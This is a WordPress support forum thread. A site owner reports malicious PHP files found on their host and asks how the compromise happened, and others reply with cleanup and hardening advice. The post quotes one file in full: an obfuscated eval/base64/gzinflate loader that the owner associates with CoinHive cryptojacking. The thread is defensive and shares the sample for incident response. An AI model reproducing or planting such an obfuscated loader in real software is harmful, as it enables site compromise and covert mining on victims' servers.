Support » Fixing WordPress » CoinHive crypto-jacking malware hack!

  • I’m hosted on 1&1 shared hosting and they have just informed me of some malicious scripts that they have found from their automated security scanning- consequently my site is down as 1&1 have modified the permissions as well as removing wp-config.php as well it seems.

    The malicious files are still there:

    • ~/clickandbuilds/LYB/gl9qlraeng.php
    • ~/clickandbuilds/LYB/wp-admin/includes/7adotrr28g.php
    • ~/clickandbuilds/LYB/wp-content/plugins/contact-form-7/y04tqyl3fu.php
    • ~/clickandbuilds/LYB/co4q736bga.php

    Opening one up I can see the contents:

    eval("\n\$dgreusdi = intval(__LINE__) * 337;");

    $a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf";
        $a = str_replace($dgreusdi, "E", $a);
        eval (gzinflate(base64_decode($a)));

    I’ve no idea what this does but after a Google, I found out about “**A critical Drupal security issue has surfaced which is allowing hackers to infect websites with the CoinHive crypto-jacking malware**”.

    I wanted to bring this issue to the attention of WordPress site owners, and also to get some answers!
    Does anyone know how this could have happened?
    What weakness was exploited?
    What’s the fix?

    FYI, WordPress auto updates was on so it was version 4.9.8, I can give you a list of plugins if it helps (there were 20), but is there an issue with Contact Form 7 specifically?

    I tried to post this on WordPress Stack Exchange but I was told it was off-topic so hopefully I can find some answers here 😉

Viewing 4 replies - 1 through 4 (of 4 total)
  • Andrew Nevins


    WCLDN 2018 Contributor | Volunteer support

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    @anevins some good advice there!

    Multiple security vulnerabilities had been discovered recently in popular WordPress plugins.

    It is worth to update/upgrade all used WordPress plugins and run internal website audit to detect all injected malicious files.

    Without curing all infected/injected files reinfection will continue to impact your site(s).

    Script detected in root of my site….
    Checking for other foreign files in subdirectories.

    I use contact-form-7 as well…..

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘CoinHive crypto-jacking malware hack!’ is closed to new replies.